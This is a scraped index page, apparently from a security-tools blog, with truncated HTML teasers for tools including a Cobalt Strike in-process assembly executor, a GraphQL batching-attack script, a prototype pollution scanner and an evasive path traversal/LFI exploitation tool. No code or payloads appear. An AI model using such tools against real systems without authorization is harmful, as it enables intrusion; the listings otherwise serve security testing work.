<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-M_M-0bf6M28/YUOdpCkjs4I/AAAAAAAAuwA/voMYX-s0vSkdD7d3_EoPvBC-EF93luWFQCNcBGAsYHQ/s2048/crowdsec_logo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1383" data-original-width="2048" height="432" src="https://1.bp.blogspot.com/-M_M-0bf6M28/YUOdpCkjs4I/AAAAAAAAuwA/voMYX-s0vSkdD7d3_EoPvBC-EF93luWFQCNcBGAsYHQ/w640-h432/crowdsec_logo.png" width="640" /></a></div><p><br /></p> <p>CrowdSec is a free, modern &amp; collaborative behavior detection engine, coupled with a global IP reputation network. It stacks on fail2ban's philosophy but is IPV6 compatible and 60x faster (Go vs Python), uses Grok patterns to parse logs and YAML scenario to identify behaviors. CrowdSec is engineered for modern Cloud / <a href="https://www.kitploit.com/search/label/Containers" target="_blank" title="Containers">Containers</a> / VM based infrastructures (by dec...

PS2EXE - Module To Compile Powershell Scripts To Executables

<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-_KxV4jubhaU/YUOcgzhpbJI/AAAAAAAAuvw/Sc0xmixjtXoKF7G1bAmJ0ibxfmIDEAIxwCNcBGAsYHQ/s873/PS2EXE.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="381" data-original-width="873" height="280" src="https://1.bp.blogspot.com/-_KxV4jubhaU/YUOcgzhpbJI/AAAAAAAAuvw/Sc0xmixjtXoKF7G1bAmJ0ibxfmIDEAIxwCNcBGAsYHQ/w640-h280/PS2EXE.JPG" width="640" /></a></div><p><br /></p> <p>Overworking of the great script of Ingo Karstein with GUI support. The GUI output and input is activated with one switch, real windows executables are generated. With Powershell 5.x support and graphical front end.</p> <p>Module version.</p><span><a name='more'></a></span><p><br /></p> <p>You find the script based version here (<a href="https://github.com/MScholtes/TechNet-Gallery" rel="nofollow" target="_blank" title="https://github.com/MScholtes/TechNet-Gallery">https://githu...

InlineExecute-Assembly - A PoC Beacon Object File (BOF) That Allows Security Professionals To Perform In Process .NET Assembly Execution

<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-CwR1NpKuyd4/YUObnj1bvzI/AAAAAAAAuvo/jTm7kjPutFA9rMwYWJtmittz4F4lid6LgCNcBGAsYHQ/s930/InlineExecute.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="606" data-original-width="930" height="418" src="https://1.bp.blogspot.com/-CwR1NpKuyd4/YUObnj1bvzI/AAAAAAAAuvo/jTm7kjPutFA9rMwYWJtmittz4F4lid6LgCNcBGAsYHQ/w640-h418/InlineExecute.png" width="640" /></a></div><p><br /></p> <p>InlineExecute-Assembly is a <a href="https://www.kitploit.com/search/label/Proof%20Of%20Concept" target="_blank" title="proof of concept">proof of concept</a> Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module. InlineExecute-Assembly will execute any assembly with the entry point of <code>Main(string[] args)</code> or <code>Mai...

BatchQL - GraphQL Security Auditing Script With A Focus On Performing Batch GraphQL Queries And Mutations

<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-4w-yAJHKJ4Q/YUOMKJAmDwI/AAAAAAAAuuY/2Tqomqypu58DXaQApHuQiwhXEcC7q17ZgCNcBGAsYHQ/s800/graphql.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="280" data-original-width="800" height="224" src="https://1.bp.blogspot.com/-4w-yAJHKJ4Q/YUOMKJAmDwI/AAAAAAAAuuY/2Tqomqypu58DXaQApHuQiwhXEcC7q17ZgCNcBGAsYHQ/w640-h224/graphql.png" width="640" /></a></div><p><br /></p> <p>BatchQL is a GraphQL security <a href="https://www.kitploit.com/search/label/Auditing" target="_blank" title="auditing">auditing</a> script with a focus on performing batch GraphQL queries and mutations. This script is not complex, and we welcome improvements.</p> <p>When exploring the problem space of GraphQL batching attacks, we found that there were a few blog posts on the internet, however no tool to perform GraphQL batching attacks.</p> <p>GraphQL batching attacks can be...

On-The-Fly - Tool Which Gives Capabilities To Perform Pentesting Tests In Several Domains (IoT, ICS & IT)

<div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-AL7wzHH2D8c/YUS_XCCASFI/AAAAAAAAvRM/D6gLmBwGwvIW1uCOBSLNnmJ41hRXQbwNgCNcBGAsYHQ/s480/on-the-fly_4.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="360" data-original-width="480" height="480" src="https://1.bp.blogspot.com/-AL7wzHH2D8c/YUS_XCCASFI/AAAAAAAAvRM/D6gLmBwGwvIW1uCOBSLNnmJ41hRXQbwNgCNcBGAsYHQ/w640-h480/on-the-fly_4.jpeg" width="640" /></a></div><p><br /></p><div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content=" ▒█████ ███▄ █ ▄▄▄█████▓ ██░ ██ ▓█████ █████ ██▓ ▓██ ██▓ ▒██▒ ██▒ ██ ▀█ █ ▓ ██▒ ▓▒▒▓██░ ██ ▓█ ▀ ▓██ ▓██▒ ▒██ ██▒ ▒██░ ██▒▓██ ▀█ ██▒ ▒ ▓██░ ▒░░▒██▀▀██ ▒███ ▒████ ▒██░ ▒██ ██░ ▒██ ██░▓██▒ ▐▌██▒ ░ ▓██▓ ░ ░▓█ ░██ ▒▓█ ▄ ░▓█▒ ▒██░ ░ ▐██▓░ ░ ████▓▒░▒██░ ▓██░ ▒██▒ ░ ░▓█▒░██▓▒░▒████ ▒░▒█░ ▒░██...

Plution - Prototype Pollution Scanner Using Headless Chrome

<p style="text-align: center;"><a href="http://1.bp.blogspot.com/-Eph2jPyIEs4/YTVMaWNoJNI/AAAAAAAAt7w/2fS0PnouBd0kTzMlCj8esDtcSXJolnV1wCK4BGAYYCw/s1600/plution_1-714956.png"><img alt="" border="0" height="556" id="BLOGGER_PHOTO_ID_7004588810967721170" src="http://1.bp.blogspot.com/-Eph2jPyIEs4/YTVMaWNoJNI/AAAAAAAAt7w/2fS0PnouBd0kTzMlCj8esDtcSXJolnV1wCK4BGAYYCw/w640-h556/plution_1-714956.png" width="640" /></a></p> <br /> <p>Plution is a convenient way to scan at scale for pages that are <a href="https://www.kitploit.com/search/label/Vulnerable" target="_blank" title="vulnerable">vulnerable</a> to <a href="https://www.kitploit.com/search/label/Client%20Side" target="_blank" title="client side">client side</a> <a href="https://www.kitploit.com/search/label/Prototype%20Pollution" target="_blank" title="prototype pollution">prototype pollution</a> via a URL payload. In the default configuration, it will use a hardcoded payload that can detect 11 of the cases documented here: <a href="htt...

Vailyn - A Phased, Evasive Path Traversal + LFI Scanning & Exploitation Tool In Python

<h1 align="center"><a href="http://4.bp.blogspot.com/-2rdx0vfyq9k/YTVN7X0T73I/AAAAAAAAuI4/Dl9NXtf72WkZGlSn7yTU6K97vHQSLTlcACK4BGAYYCw/s1600/Vailyn_1_logo-700923.png"><img alt="" border="0" height="400" id="BLOGGER_PHOTO_ID_7004590477845720946" src="http://4.bp.blogspot.com/-2rdx0vfyq9k/YTVN7X0T73I/AAAAAAAAuI4/Dl9NXtf72WkZGlSn7yTU6K97vHQSLTlcACK4BGAYYCw/w193-h400/Vailyn_1_logo-700923.png" width="193" /></a><br /> Vailyn <br /> </h1> <p align="center"><br /> Phased <a href="https://www.kitploit.com/search/label/Path%20Traversal" target="_blank" title="Path Traversal">Path Traversal</a> &amp; LFI Attacks </p> <blockquote> <p><strong>Vailyn 3.0</strong></p> <p>Since v3.0, Vailyn supports LFI PHP wrappers in Phase 1. Use <code>--lfi</code> to include them in the scan.</p> </blockquote> <br /><span style="font-size: x-large;"><b>About</b></span><br /> <p>Vailyn is a multi-phased <a href="https://www.kitploit.com/search/label/Vulnerability%20Analysis" target="_blank" title="...